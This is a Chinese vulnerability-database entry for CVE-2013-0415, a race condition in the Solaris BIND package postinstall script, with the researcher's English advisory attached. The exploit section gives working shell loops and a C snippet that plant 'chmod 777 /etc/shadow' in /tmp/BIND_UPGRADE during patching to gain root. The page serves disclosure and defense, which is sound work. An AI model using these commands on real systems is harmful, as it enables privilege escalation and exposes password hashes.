Oracle Sun Products Suite 本地安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1169663 漏洞类型 Unknown
发布时间 2013-01-15 更新时间 2013-07-22
CVE编号 CVE-2013-0415 CNNVD-ID CNNVD-201301-280
漏洞平台 N/A CVSS评分 6.0
|漏洞来源
https://www.securityfocus.com/bid/57403
https://cxsecurity.com/issue/WLB-2018100057
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201301-280
|漏洞详情
OracleOracleSolaris是美国甲骨文(Oracle)公司的一套类Unix操作系统。OracleSunSolaris10版本中存在未明安全漏洞。通过与Bind数据包中的Bind/Postinstall脚本相关的未知向量,本地攻击者利用该漏洞影响保密性,完整性以及可用性。
|漏洞EXP
Title: Oracle Solaris Bind/Postinstall script for Bind package local root
Author: Larry W. Cashdollar, @_larry0
Date: 2013-01-14
CVE-ID:[CVE-2013-0415]
Download Site: www.oracle.com
Vendor: Oracle Systems
Vendor Notified: 2013-01-15
Vendor Contact: security@oracle.com
Advisory: http://www.vapid.dhs.org/advisories/solaris_patch_cluster_race.html
Description: Solaris Sparc patch cluster January 2013.
Vulnerability:
If the system administrator is updating the system using update manager or smpatch (multi user mode) a race condition exists with the postinstall script for SUNWbindr that may lead to arbitrary code execution as root if the race is won.

vulnerable code in:

./patches/119784-22/SUNWbindr/install/pkg_postinstall: UPGRADE=${TMP}/BIND_UPGRADE ./patches/119784-22/SUNWbindr/install/postinstall: UPGRADE=${TMP}/BIND_UPGRADE

vulnerable code:

UPGRADE=${TMP}/BIND_UPGRADE
rm -f $UPGRADE

(If I create the file first between these two steps, I should have ownership before it is over written and inject malicious code to get root.)

cat >> $UPGRADE <<-\UPDATESTART_METHOD oset=$@ # Remember current options if any. svc="svc:network/dns/server"
if [ -z "$TMP" ]; then
TMP="/tmp"
fi
Export: JSON TEXT XML
Exploit Code:
If the following is run:
 
while (true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" > /tmp/BIND_UPGRADE; done
 
during patch installation you can get /etc/shadow world writeable.
 
Vladz suggested:
 
Another approach to exploit this is to place your evil command in a file called /tmp/BIND_UPGRADE.new, and loop the move command.
 
$ while ! mv /tmp/BIND_UPGRADE.new /tmp/BIND_UPGRADE 2>/dev/null; do continue; done
 
or in C:
 
while (rename("/tmp/BIND_UPGRADE.new", "/tmp/BIND_UPGRADE") != 0) continue;
 
I am telling this because I think that moving a file takes less syscalls (one at least) than a "echo string >> file" that open(), write() and close() the file.
|受影响的产品
Xerox FreeFlow Print Server (FFPS) 73.C0.41 Xerox FreeFlow Print Server (FFPS) 73.B3.61 Avaya IR 4.0 Avaya Call Management System R 16.0
|参考资料

来源:www.oracle.com
链接:http://www.oracle.com/technetwork/topics/security/cpujan2013-1515902.html
来源:SECUNIA
名称:51892
链接:http://secunia.com/advisories/51892
来源:BID
名称:57403
链接:http://www.securityfocus.com/bid/57403